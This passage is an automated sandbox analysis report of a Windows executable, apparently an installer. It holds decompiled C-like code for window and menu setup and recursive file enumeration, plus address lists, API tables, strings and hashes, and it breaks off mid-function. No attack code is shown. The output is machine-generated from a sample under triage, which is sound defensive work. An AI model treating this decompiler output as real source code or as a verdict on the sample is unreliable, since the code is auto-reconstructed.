				E00414814( *((intOrPtr*)( *_t1456 + 0x254)),  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2c0)) + 0x28)) +  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2c0)) + 0x30)));
				_t1723 =  *0x48dea8; // 0x21ec05c
				E00414D30( *((intOrPtr*)( *_t1456 + 0x258)), _t1456, _t1723, _t977, _t1067);
				_t1724 =  *0x48dd1c; // 0x21ea968
				E00414D30( *((intOrPtr*)( *_t1456 + 0x25c)), _t1456, _t1724, _t1850, _t1067);
				 *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x2d0)) + 0x154)) = E004881E8( *_t1456, 0x16);
				E004035DC( &_v48, 0x462628);
				_t1729 =  *0x48db8c; // 0x0
				E004036C4( &_v48, _t1729);
				E004036C4( &_v48, 0x462628);
				E00414D30( *((intOrPtr*)( *_t1456 + 0x280)), _t1456, _v48, _t1850, _t1067);
				if( *0x4ae214 != 0) {
					E0044FBA8( *((intOrPtr*)( *_t1456 + 0x26c)), 1);
					E0044FCDC();
				}
				if( *0x4ae218 != 0) {
					E0044FBA8( *((intOrPtr*)( *_t1456 + 0x234)), 1);
					E0044FCDC();
				}
				if( *0x4ae21c != 0) {
					E0044FBA8( *((intOrPtr*)( *_t1456 + 0x270)), 1);
					E0044FCDC();
				}
				_t1880 = GetSystemMenu(E004183F8( *_t1456), 0);
				AppendMenuA(_t1880, 0x800, 0, 0);
				_t1121 =  *0x48db70; // 0x21e8eb4
				AppendMenuA(_t1880, 0, 0x270f, E00403880(_t1121));
				E00462898( *_t1456, _t1456, _t1496, _t1850, _t1880); // executed
				_v28 = 0xffffffff;
				if(( *0x4ae180 & 0x00000001) != 0) {
					if( *((intOrPtr*)( *_t1456 + 0x30c)) != 0) {
						E00414D30( *((intOrPtr*)( *_t1456 + 0x2ac)), _t1456,  *((intOrPtr*)( *_t1456 + 0x30c)), _t1850, _t1880);
						E00414D30( *((intOrPtr*)( *_t1456 + 0x2b4)), _t1456,  *((intOrPtr*)( *_t1456 + 0x310)), _t1850, _t1880);
						E00414D30( *((intOrPtr*)( *_t1456 + 0x2c8)), _t1456,  *((intOrPtr*)( *_t1456 + 0x314)), _t1850, _t1880);
					} else {
						_t1335 =  *0x4ae0b0; // 0x21e5890
						E004717F8(_t1335, _t1496,  &_v48);
						E00414D30( *((intOrPtr*)( *_t1456 + 0x2ac)), _t1456, _v48, _t1850, _t1880);
						_t1340 =  *0x4ae0b4; // 0x21e58b0
						E004717F8(_t1340, _t1496,  &_v48);
						E00414D30( *((intOrPtr*)( *_t1456 + 0x2b4)), _t1456, _v48, _t1850, _t1880);
						_t1345 =  *0x4ae0b8; // 0x0
						E004717F8(_t1345, _t1496,  &_v48);
						E00414D30( *((intOrPtr*)( *_t1456 + 0x2c8)), _t1456, _v48, _t1850, _t1880);
					}
				}
				if(( *0x4ae17c & 0x00000004) == 0) {
					_t1732 =  *0x4ae01c; // 0x21fd9ec
					E00414D30( *((intOrPtr*)( *_t1456 + 0x208)), _t1456, _t1732, _t1850, _t1880);
				} else {
					_t1302 =  *0x4ae088; // 0x21e4b00
					E004717F8(_t1302, _t1496,  &_v48);
					E00403598( *_t1456 + 0x2f4, _t1456, _v48, _t1850, _t1880);
					_t1920 =  *0x4adfac;
					if( *0x4adfac == 0) {
						E004035DC( &_v24,  *((intOrPtr*)( *_t1456 + 0x300)));
						__eflags = _v24;
						if(_v24 == 0) {
							E004035DC( &_v24,  *((intOrPtr*)( *_t1456 + 0x2f4)));
						}
					} else {
						E004035DC( &_v24,  *0x4adfac);
					}
					E0042C8F0(_v24,  &_v64);
					E0042CC98(_v64, _t1496,  &_v48, _t1920);
					E004035DC( &_v24, _v48);
					E00414D30( *((intOrPtr*)( *_t1456 + 0x208)), _t1456, _v24, _t1850, _t1880);
				}
				_t1129 =  *0x4ae1d0; // 0x21d2a88
				if( *((intOrPtr*)(_t1129 + 8)) <= 0) {
					L58:
					 *((intOrPtr*)( *_t1456 + 0x338)) = 0;
					_t1734 = 0;
					 *( *_t1456 + 0x334) = 0;
					_t1132 =  *0x4ae1d4; // 0x21d2a9c
					_t1134 =  *((intOrPtr*)(_t1132 + 8)) - 1;
					if(_t1134 < 0) {
						L63:
						E0042BB84( *((intOrPtr*)( *_t1456 + 0x278)));
						E0044E760( *((intOrPtr*)( *_t1456 + 0x278)), _t1734 & 0xffffff00 | ( *0x4ae17f & 0x00000002) != 0x00000000);
						_t1141 =  *0x4ae1d4; // 0x21d2a9c
						_t1143 =  *((intOrPtr*)(_t1141 + 8)) - 1;
						if(_t1143 < 0) {
							L69:
							if( *((intOrPtr*)( *((intOrPtr*)( *0x4adfc4)) + 0x10))() == 0) {
								__eflags = _v28 - 0xffffffff;
								if(_v28 == 0xffffffff) {
									_t1146 =  *0x4ae1d0; // 0x21d2a88
									__eflags =  *(_t1146 + 8);
									if( *(_t1146 + 8) > 0) {
										_t1213 =  *0x4ae1d0; // 0x21d2a88
										_v32 = E0040B654(_t1213, 0);
										_t1496 = 0;
										__eflags = 0;
										E004631D4( *_t1456, 0,  *_v32, _t1886);
									}
								} else {
									_t1218 =  *0x4ae1d0; // 0x21d2a88
									_v32 = E0040B654(_t1218, _v28);
									_t1220 = _v32;
									__eflags =  *(_t1220 + 0x24) & 0x00000001;
									if(( *(_t1220 + 0x24) & 0x00000001) == 0) {
										_t1221 =  *0x4ae1d0; // 0x21d2a88
										_v32 = E0040B654(_t1221, _v28);
										_t1496 = 0;
										E004631D4( *_t1456, 0,  *_v32, _t1886);
									} else {
										_t1226 =  *0x4ae1d0; // 0x21d2a88
										_v32 = E0040B654(_t1226, 0);
										E004631D4( *_t1456, 0,  *_v32, _t1886);
										_t1496 =  *((intOrPtr*)( *_t1456 + 0x320));
										E0046314C( *_t1456,  *((intOrPtr*)( *_t1456 + 0x320)),  *((intOrPtr*)( *_t1456 + 0x31c)));
									}
								}
								L83:
								E00460AEC( *_t1456);
								E00460858( *_t1456, _t1456, _t1850, _t1880, _t1953);
								if( *0x4ae25a == 0) {
									__eflags = 0;
									E00414C5C( *((intOrPtr*)( *_t1456 + 0x278)), _t1496, 0, _t1850);
								} else {
									_t1203 = E0042A258( *((intOrPtr*)( *_t1456 + 0x224)));
									_t1204 =  *0x4ae1d0; // 0x21d2a88
									_v32 = E0040B654(_t1204, _t1203);
									if(( *(_v32 + 0x24) & 0x00000001) != 0 || ( *0x4ae17f & 0x00000001) != 0) {
										E00414C5C( *((intOrPtr*)( *_t1456 + 0x278)), _t1496, 1, _t1850);
									} else {
										E00414C5C( *((intOrPtr*)( *_t1456 + 0x278)), _t1496, 0, _t1850);
									}
								}
								E00414C5C( *((intOrPtr*)( *_t1456 + 0x27c)), _t1496,  *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x278)) + 0x37)), _t1850);
								if( *0x4ae25a != 0) {
									 *((intOrPtr*)( *_t1456 + 0x330)) = E0042A258( *((intOrPtr*)( *_t1456 + 0x224)));
									_push(0);
									_t1496 = 0;
									E00463364( *_t1456, _t1456, 0,  *((intOrPtr*)( *_t1456 + 0x32c)), _t1850, _t1880);
								}
								_t1159 =  *0x4ae08c; // 0x21e4b20
								E004717F8(_t1159, _t1496,  &_v48);
								E00403598( *_t1456 + 0x2f8, _t1456, _v48, _t1850, _t1880);
								if( *0x4adfb0 == 0 || ( *0x4ae17c & 0x00000010) != 0) {
									_t1164 =  *_t1456;
									__eflags =  *(_t1164 + 0x304);
									if( *(_t1164 + 0x304) == 0) {
										L96:
										E004035DC( &_v24,  *((intOrPtr*)( *_t1456 + 0x2f8)));
										goto L98;
									}
									E004037CC( *((intOrPtr*)( *_t1456 + 0x304)), "(Default)");
									if(__eflags != 0) {
										E004035DC( &_v24,  *((intOrPtr*)( *_t1456 + 0x304)));
										goto L98;
									}
									goto L96;
								} else {
									E004035DC( &_v24,  *0x4adfb0);
									L98:
									E00414D30( *((intOrPtr*)( *_t1456 + 0x20c)), _t1456, _v24, _t1850, _t1880);
									if(( *0x4ae17c & 0x00000020) == 0) {
										__eflags = 0;
										E00414C5C( *((intOrPtr*)( *_t1456 + 0x210)), _t1496, 0, _t1850);
									} else {
										if( *0x4adfbc != 0 ||  *((char*)( *_t1456 + 0x318)) != 0) {
											E0042B2FC(1);
										}
										E00414C5C( *((intOrPtr*)( *_t1456 + 0x210)), _t1496, 1, _t1850);
									}
									 *((char*)( *_t1456 + 0x2fc)) = 1;
									_pop(_t1745);
									 *[fs:eax] = _t1745;
									_push(E004625D7);
									E00403548( &_v64);
									E00403548( &_v48);
									return E00403548( &_v24);
								}
							}
							_t1496 = 0;
							E0046314C( *_t1456, 0,  *0x4adfc4);
							if( *0x4ae25a == 0) {
								goto L83;
							}
							_t1237 =  *0x4ae1d0; // 0x21d2a88
							_t1239 =  *((intOrPtr*)(_t1237 + 8)) - 1;
							if(_t1239 < 0) {
								goto L83;
							}
							_v44 = _t1239 + 1;
							_t1880 = 0;
							while(1) {
								_t1241 =  *0x4ae1d0; // 0x21d2a88
								_v32 = E0040B654(_t1241, _t1880);
								if(( *(_v32 + 0x24) & 0x00000001) != 0) {
									break;
								}
								_t1880 =  &(_t1880->i);
								_t499 =  &_v44;
								 *_t499 = _v44 - 1;
								__eflags =  *_t499;
								if( *_t499 != 0) {
									continue;
								}
								goto L83;
							}
							E0042A274( *((intOrPtr*)( *_t1456 + 0x224)), _t1880);
							goto L83;
						}
						_v44 = _t1143 + 1;
						_t1881 = 0;
						do {
							_t1248 =  *0x4ae1d4; // 0x21d2a9c
							_t1850 = E0040B654(_t1248, _t1881);
							if(( *(_t1850 + 0x35) & 0x00000008) == 0) {
								 *(_t1850 + 0x35) & 0x00000001 =  *(_t1850 + 0x35) & 0x00000010;
								E004717F8( *((intOrPtr*)(_t1850 + 4)), _t1496,  &_v48);
								_t1496 = 0;
								__eflags = 0;
								E0044C8C0( *((intOrPtr*)( *_t1456 + 0x278)), _v48, _t1850, ( *(_t1850 + 0x20) & 0xffffff00 | 0 != 0x00000000) ^ 0x00000001,  *(_t1850 + 0x20), ( *(_t1850 + 0x1c) & 0xffffff00 | 0 != 0x00000000) ^ 0x00000001, 0,  *(_t1850 + 0x1c));
							} else {
								E004717F8( *((intOrPtr*)(_t1850 + 4)), _t1496,  &_v48);
								_t1496 = 0;
								E0044C990(0, _v48, _t1850, ( *(_t1850 + 0x1c) & 0xffffff00 | ( *(_t1850 + 0x35) & 0x00000001) != 0x00000000) ^ 0x00000001, 0,  *(_t1850 + 0x1c));
							}
							_t1881 = _t1881 + 1;
							_t488 =  &_v44;
							 *_t488 = _v44 - 1;
						} while ( *_t488 != 0);
						goto L69;
					}
					_v44 = _t1134 + 1;
					_t1882 = 0;
					do {
						_t1270 =  *0x4ae1d4; // 0x21d2a9c
						_t1850 = E0040B654(_t1270, _t1882);
						_t443 =  *_t1456 + 0x334; // 0x334
						_t1734 = _t443;
						_t444 = _t1850 + 0x36; // 0x36
						if(E00430178(_t444, _t443) > 0) {
							_t1275 =  *_t1456;
							 *((intOrPtr*)(_t1275 + 0x334)) =  *((intOrPtr*)(_t1850 + 0x36));
							_t1734 =  *(_t1850 + 0x3a);
							 *(_t1275 + 0x338) =  *(_t1850 + 0x3a);
						}
						_t1882 = _t1882 + 1;
						_t449 =  &_v44;
						 *_t449 = _v44 - 1;
					} while ( *_t449 != 0);
					goto L63;
				} else {
					E0042A1F0( *((intOrPtr*)( *_t1456 + 0x224)));
					_t1279 =  *0x4ae1d0; // 0x21d2a88
					_t1281 =  *((intOrPtr*)(_t1279 + 8)) - 1;
					if(_t1281 < 0) {
						L55:
						if(_v28 == 0xffffffff) {
							__eflags = 0;
							E0042A274( *((intOrPtr*)( *_t1456 + 0x224)), 0);
						} else {
							E0042A274( *((intOrPtr*)( *_t1456 + 0x224)), _v28);
						}
						goto L58;
					}
					_v44 = _t1281 + 1;
					_t1883 = 0;
					do {
						_t1289 =  *0x4ae1d0; // 0x21d2a88
						_v32 = E0040B654(_t1289, _t1883);
						E004717F8( *((intOrPtr*)(_v32 + 4)), _t1496,  &_v48);
						_t1496 = _v32;
						_t1850 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x224)) + 0xfc))));
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t1456 + 0x224)) + 0xfc)))) + 0x30))();
						if(E00406B28( *_v32,  *((intOrPtr*)( *_t1456 + 0x308))) == 0) {
							_v28 = _t1883;
						}
						_t1883 = _t1883 + 1;
						_t433 =  &_v44;
						 *_t433 = _v44 - 1;
					} while ( *_t433 != 0);
					goto L55;
				}
			}

0x00460f30
0x00460f30
0x00460f30
0x00460f30
0x00460f31
0x00460f33
0x00460f36
0x00460f37
0x00460f38
0x00460f3b
0x00460f3e
0x00460f41
0x00460f46
0x00460f48
0x00460f4b
0x00460f4b
0x00460f50
0x00460f53
0x00460f56
0x00460f59
0x00460f67
0x00460f71
0x00460f84
0x00460f98
0x00460fac
0x00460fc0
0x00460fd4
0x00460fe8
0x00460fee
0x00461003
0x00461007
0x0046100b
0x0046101e
0x0046102b
0x0046102e
0x00461030
0x00461032
0x00461032
0x0046103f
0x0046103f
0x00461044
0x0046104b
0x00461050
0x00461059
0x0046105d
0x0046106a
0x00461074
0x00461081
0x00461084
0x00461086
0x00461088
0x00461088
0x0046108b
0x0046108b
0x00461095
0x00461095
0x0046109c
0x004610a1
0x004610a8
0x004610bd
0x004610aa
0x004610b4
0x004610b4
0x004610d1
0x004610d7
0x004610dd
0x004610ed
0x004610f3
0x00461103
0x00461109
0x00461115
0x00461126
0x00461129
0x00461131
0x0046113b
0x00461117
0x00461117
0x0046111f
0x0046111f
0x00461147
0x00461150
0x0046115a
0x00461165
0x0046116d
0x00461176
0x00461180
0x0046118a
0x0046118a
0x0046118f
0x00461193
0x00461197
0x0046119b
0x0046119f
0x004611b2
0x004611c0
0x004611cd
0x004611dc
0x004611eb
0x004611f2
0x004611f9
0x00461208
0x0046120d
0x0046121c
0x00461221
0x0046122d
0x0046123a
0x00461240
0x00461253
0x00461262
0x00461279
0x00461286
0x0046128c
0x0046129f
0x004612ae
0x004612c5
0x004612d2
0x004612d8
0x004612dd
0x004612ef
0x004612f9
0x00461314
0x00461326
0x00461338
0x0046133e
0x00461359
0x00461363
0x00461370
0x00461380
0x0046138f
0x004613af
0x004613b9
0x004613c6
0x004613ce
0x004613d4
0x004613e4
0x004613f2
0x004613f8
0x0046140d
0x00461417
0x00461427
0x00461449
0x00461456
0x0046145c
0x00461469
0x0046146f
0x0046147d
0x00461483
0x00461498
0x004614a5
0x004614ab
0x004614b8
0x004614be
0x004614e1
0x00461504
0x00461512
0x00461518
0x0046152d
0x0046153a
0x00461540
0x00461562
0x00461570
0x00461576
0x0046157e
0x0046158b
0x00461598
0x0046159e
0x004615b2
0x004615c1
0x004615d3
0x004615e0
0x004615e6
0x004615fa
0x00461609
0x0046160e
0x00461615
0x0046167b
0x00461688
0x0046168a
0x00461617
0x0046162c
0x00461639
0x0046163f
0x0046166a
0x0046166a
0x00461698
0x004616a3
0x004616bb
0x004616c5
0x004616d5
0x004616e1
0x004616ea
0x004616f6
0x004616fa
0x0046170f
0x00461716
0x00461718
0x00461725
0x00461740
0x00461759
0x0046175b
0x0046175d
0x0046175f
0x0046175f
0x0046176a
0x00461775
0x00461775
0x0046177f
0x0046178f
0x004617b1
0x004617b9
0x004617ce
0x004617f6
0x00461819
0x00461826
0x0046182c
0x00461831
0x0046183c
0x00461841
0x0046187f
0x004618ae
0x004618b8
0x004618c8
0x004618e5
0x004618f3
0x004618fe
0x00461916
0x00461920
0x00461930
0x00461944
0x0046195b
0x00461968
0x0046196c
0x00461976
0x00461986
0x00461995
0x004619a1
0x004619a3
0x004619ac
0x004619b8
0x004619d0
0x004619dd
0x004619dd
0x004619ac
0x004619eb
0x004619f6
0x00461a0e
0x00461a18
0x00461a28
0x00461a34
0x00461a51
0x00461a55
0x00461a71
0x00461a73
0x00461a80
0x00461a9b
0x00461ab4
0x00461ab6
0x00461ab8
0x00461aba
0x00461aba
0x00461ac5
0x00461ad0
0x00461ad0
0x00461ada
0x00461aea
0x00461b14
0x00461b1c
0x00461b39
0x00461b61
0x00461b8c
0x00461b99
0x00461b9f
0x00461ba4
0x00461baf
0x00461bb4
0x00461bf2
0x00461c21
0x00461c2e
0x00461c34
0x00461c42
0x00461c4d
0x00461c65
0x00461c6f
0x00461c7f
0x00461ca1
0x00461cb0
0x00461cc9
0x00461ccf
0x00461ce1
0x00461cef
0x00461cfa
0x00461d12
0x00461d20
0x00461d2b
0x00461d43
0x00461d51
0x00461d5c
0x00461d74
0x00461d82
0x00461d88
0x00461d9d
0x00461daa
0x00461db0
0x00461dd2
0x00461dec
0x00461e00
0x00461e06
0x00461e0c
0x00461e1c
0x00461e22
0x00461e2c
0x00461e34
0x00461e3a
0x00461e3b
0x00461e4b
0x00461e5a
0x00461e7d
0x00461e8a
0x00461e90
0x00461e9d
0x00461ea3
0x00461ebc
0x00461eca
0x00461ed2
0x00461ed8
0x00461ee5
0x00461ef5
0x00461f01
0x00461f0d
0x00461f20
0x00461f20
0x00461f2c
0x00461f38
0x00461f4b
0x00461f4b
0x00461f57
0x00461f63
0x00461f76
0x00461f76
0x00461f8a
0x00461f96
0x00461f9b
0x00461fae
0x00461fb5
0x00461fba
0x00461fc8
0x00461fd7
0x00462042
0x00462057
0x0046206c
0x00461fd9
0x00461fdc
0x00461fe1
0x00461ff1
0x00461ff9
0x00461ffe
0x0046200e
0x00462016
0x0046201b
0x0046202b
0x0046202b
0x00461fd7
0x00462078
0x00462114
0x0046211a
0x0046207e
0x00462081
0x00462086
0x00462095
0x0046209a
0x004620a1
0x004620be
0x004620c3
0x004620c7
0x004620d4
0x004620d4
0x004620a3
0x004620ac
0x004620ac
0x004620df
0x004620ea
0x004620f5
0x00462105
0x00462105
0x0046211f
0x00462128
0x004621ca
0x004621ce
0x004621d6
0x004621d8
0x004621de
0x004621e6
0x004621e9
0x0046222d
0x00462235
0x0046224c
0x00462251
0x00462259
0x0046225c
0x004622f2
0x004622fe
0x0046236a
0x0046236e
0x004623df
0x004623e4
0x004623e8
0x004623ec
0x004623f6
0x004623fe
0x004623fe
0x00462402
0x00462402
0x00462370
0x00462373
0x0046237d
0x00462380
0x00462383
0x00462387
0x004623c2
0x004623cc
0x004623d4
0x004623d8
0x00462389
0x0046238b
0x00462395
0x004623a1
0x004623a8
0x004623b8
0x004623b8
0x00462387
0x00462407
0x00462409
0x00462410
0x0046241c
0x00462476
0x00462478
0x0046241e
0x00462426
0x0046242d
0x00462437
0x00462441
0x00462456
0x0046245d
0x00462467
0x00462467
0x00462441
0x00462490
0x0046249c
0x004624ad
0x004624b3
0x004624bd
0x004624c1
0x004624c1
0x004624c9
0x004624ce
0x004624dd
0x004624e9
0x00462504
0x00462506
0x0046250d
0x00462523
0x0046252e
0x00000000
0x0046252e
0x0046251c
0x00462521
0x00462540
0x00000000
0x00462540
0x00000000
0x004624f4
0x004624fd
0x00462545
0x00462550
0x0046255c
0x0046259a
0x0046259c
0x0046255e
0x00462565
0x0046257c
0x0046257c
0x0046258b
0x0046258b
0x004625a3
0x004625ac
0x004625af
0x004625b2
0x004625ba
0x004625c2
0x004625cf
0x004625cf
0x004624e9
0x00462300
0x0046230a
0x00462316
0x00000000
0x00000000
0x0046231c
0x00462324
0x00462327
0x00000000
0x00000000
0x0046232e
0x00462331
0x00462333
0x00462335
0x0046233f
0x00462349
0x00000000
0x00000000
0x0046235f
0x00462360
0x00462360
0x00462360
0x00462363
0x00000000
0x00000000
0x00000000
0x00462365
0x00462355
0x00000000
0x00462355
0x00462263
0x00462266
0x00462268
0x0046226a
0x00462274
0x0046227a
0x004622c0
0x004622d1
0x004622e1
0x004622e1
0x004622e3
0x0046227c
0x00462293
0x004622a3
0x004622a5
0x004622a5
0x004622e8
0x004622e9
0x004622e9
0x004622e9
0x00000000
0x00462268
0x004621ec
0x004621ef
0x004621f1
0x004621f3
0x004621fd
0x00462201
0x00462201
0x00462207
0x00462211
0x00462213
0x00462218
0x0046221e
0x00462221
0x00462221
0x00462227
0x00462228
0x00462228
0x00462228
0x00000000
0x0046212e
0x00462136
0x0046213b
0x00462143
0x00462146
0x004621a3
0x004621a7
0x004621c3
0x004621c5
0x004621a9
0x004621b4
0x004621b4
0x00000000
0x004621a7
0x00462149
0x0046214c
0x0046214e
0x00462150
0x0046215a
0x00462166
0x0046217c
0x0046217f
0x00462181
0x00462198
0x0046219a
0x0046219a
0x0046219d
0x0046219e
0x0046219e
0x0046219e
0x00000000
0x0046214e

APIs

Part of subcall function 00487FDC: GetWindowRect.USER32 ref: 00487FF2

LoadBitmapA.USER32 ref: 004612FF

Part of subcall function 0041D8C8: GetObjectA.GDI32(?,00000018,?), ref: 0041D8F3

Part of subcall function 00460D8C: SHGetFileInfo.SHELL32(onG,00000010,?,00000160,00001010), ref: 00460E29
Part of subcall function 00460D8C: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00460E4F
Part of subcall function 00460D8C: SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00460EAB
Part of subcall function 00460D8C: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00460ED1

Part of subcall function 0046073C: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,004613B4,00000000,00000000,00000000,00400000,STOPIMAGE,0000000C,00000000), ref: 00460754

Part of subcall function 004881E8: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 004881F2

Part of subcall function 00487F3C: 740BAC50.USER32(00000000,?,?,?), ref: 00487F5C
Part of subcall function 00487F3C: SelectObject.GDI32(?,00000000), ref: 00487F7F
Part of subcall function 00487F3C: 740BB380.USER32(00000000,?,00487FCF,00487FC8,?,00000000,?,?,?), ref: 00487FC2

Part of subcall function 004881D8: MulDiv.KERNEL32(0000004B,?,00000006), ref: 004881E2

GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021EA3C8,021D2D74,?,?,021D3874,?,?,021D38C4,?), ref: 00461F85
AppendMenuA.USER32 ref: 00461F96
AppendMenuA.USER32 ref: 00461FAE

Part of subcall function 0042A274: SendMessageA.USER32 ref: 0042A28A

Strings

(Default), xrefs: 00462517
, xrefs: 004613C1
onG, xrefs: 004611F9, 0046120D
STOPIMAGE, xrefs: 004612F4

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Menu$AppendExtractFileIconInfoObject$B380BitmapCallbackDispatcherLoadMessageRectSelectSendSystemUserWindow
String ID: $(Default)$STOPIMAGE$onG
API String ID: 3668695379-160609372
Opcode ID: 1c99e953bbcf19cbf56a7ffc324dc7e2ffb27f79ebf7619b101cafcd03b93e80
Instruction ID: fa8e63858c05eaafd14b1f9a81e0f0822a6240c8be4c2bcdd3680a191e13e730
Opcode Fuzzy Hash: 1c99e953bbcf19cbf56a7ffc324dc7e2ffb27f79ebf7619b101cafcd03b93e80
Instruction Fuzzy Hash: C2F2D4786005108FCB00EB69C5D9F9A73F1BF4A304F1581B6E9149B36ADB78AC46CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00474708 Relevance: 9.1, APIs: 6, Instructions: 149
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00474708(void* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, char _a8, char _a12, intOrPtr _a16) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				struct _WIN32_FIND_DATAA _v344;
				char _v348;
				char _v352;
				void* _t62;
				signed char _t103;
				int _t106;
				intOrPtr* _t115;
				intOrPtr _t126;
				intOrPtr _t137;
				void* _t140;
				void* _t142;
				void* _t144;
				void* _t145;
				intOrPtr _t146;

				_t144 = _t145;
				_t146 = _t145 + 0xfffffea4;
				_v348 = 0;
				_v352 = 0;
				_v12 = 0;
				_v8 = __ecx;
				_t140 = __edx;
				_t142 = __eax;
				_t115 = _a4;
				_push(_t144);
				_push(0x474904);
				_push( *[fs:eax]);
				 *[fs:eax] = _t146;
				_push(__eax);
				_push(__edx);
				_push(_v8);
				E0040377C();
				 *((intOrPtr*)(_t115 + 4)) = 0;
				 *_t115 = 0;
				_t62 = FindFirstFileA(E00403880(_v12),  &_v344); // executed
				_v16 = _t62;
				if(_v16 != 0xffffffff) {
					do {
						_t103 = _v344.dwFileAttributes;
						if((_t103 & 0x00000010) == 0 && (_a12 == 0 || (_t103 & 0x00000002) == 0)) {
							_v20 = _v344.nFileSizeHigh;
							_v24 = _v344.nFileSizeLow;
							E004301B4(_t115,  &_v24);
						}
						_t106 = FindNextFileA(_v16,  &_v344); // executed
					} while (_t106 != 0);
					FindClose(_v16); // executed
				}
				if(_a8 == 0) {
					L14:
					_pop(_t126);
					 *[fs:eax] = _t126;
					_push(0x47490b);
					E00403568( &_v352, 2);
					return E00403548( &_v12);
				} else {
					E004035DC( &_v348, _t142);
					E004036C4( &_v348, _t140);
					E004036C4( &_v348, 0x47491c);
					_v16 = FindFirstFileA(E00403880(_v348),  &_v344);
					if(_v16 == 0xffffffff) {
						goto L14;
					} else {
						_push(_t144);
						_push(0x4748d7);
						_push( *[fs:eax]);
						 *[fs:eax] = _t146;
						do {
							if(E004727E8( &_v344) != 0) {
								E004035DC( &_v348, _t140);
								E004036A4( &_v352, 0x104,  &(_v344.cFileName));
								E004036C4( &_v348, _v352);
								E004036C4( &_v348, 0x474928);
								E00474708(_t142, _t115, _v8, _v348, _t140, _t142,  &_v24, _a8, _a12, _a16);
								E004301B4(_t115,  &_v24);
							}
						} while (FindNextFileA(_v16,  &_v344) != 0);
						_pop(_t137);
						 *[fs:eax] = _t137;
						_push(0x4748de);
						return FindClose(_v16);
					}
				}
			}

0x00474709
0x0047470b
0x00474716
0x0047471c
0x00474722
0x00474725
0x00474728
0x0047472a
0x0047472c
0x00474731
0x00474732
0x00474737
0x0047473a
0x0047473d
0x0047473e
0x0047473f
0x0047474a
0x00474751
0x00474756
0x00474768
0x0047476d
0x00474774
0x00474776
0x00474776
0x0047477e
0x00474790
0x00474799
0x004747a1
0x004747a1
0x004747b1
0x004747b6
0x004747be
0x004747be
0x004747c7
0x004748de
0x004748e0
0x004748e3
0x004748e6
0x004748f6
0x00474903
0x004747cd
0x004747dc
0x004747e9
0x004747f9
0x0047480f
0x00474816
0x00000000
0x0047481c
0x0047481e
0x0047481f
0x00474824
0x00474827
0x0047482a
0x00474837
0x00474851
0x00474867
0x00474878
0x00474888
0x00474898
0x004748a3
0x004748a3
0x004748b8
0x004748c2
0x004748c5
0x004748c8
0x004748d6
0x004748d6
0x00474816

APIs

FindFirstFileA.KERNEL32(00000000,?,?,?,?,00000000,00474904), ref: 00474768
FindNextFileA.KERNEL32(000000FF,?,00000000,?,?,?,?,00000000,00474904), ref: 004747B1
FindClose.KERNEL32(000000FF,000000FF,?,00000000,?,?,?,?,00000000,00474904), ref: 004747BE
FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,?,00000000,00474904), ref: 0047480A
FindNextFileA.KERNEL32(000000FF,?,00000000,004748D7,?,00000000,?,00000000,?,?,?,?,00000000,00474904), ref: 004748B3
FindClose.KERNEL32(000000FF,004748DE,004748D7,?,00000000,?,00000000,?,?,?,?,00000000,00474904), ref: 004748D1

Memory Dump Source

Source File: 00000001.00000002.326723738.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.326717988.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326805775.000000000048C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326813698.00000000004AE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.326821048.00000000004BC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_is-QPTG8.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: a882f1102a79a861b54218c01fcb81d0adb3c4fc3eb91818c8534095f01f3513
Instruction ID: 7e5dc6ec700e7df3bf3b4c4babfc982930ba6fdb09bfad156bf1a6e2e59e4400
Opcode Fuzzy Hash: a882f1102a79a861b54218c01fcb81d0adb3c4fc3eb91818c8534095f01f3513
Instruction Fuzzy Hash: 6F514FB4900658AFCB21DF65CC45AEEB7B8EB89315F1084AAE408E7391D7389E458F54

Uniqueness

Uniqueness Score: -1.00%

Function 0046C770 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 96
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E0046C770(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _WIN32_FIND_DATAA _v328;
				char _v332;
				void* _t42;
				void* _t79;
				intOrPtr _t88;
				void* _t98;

				_v332 = 0;
				_v8 = 0;
				_push(_t98);
				_push(0x46c8c2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t98 + 0xfffffeb8;
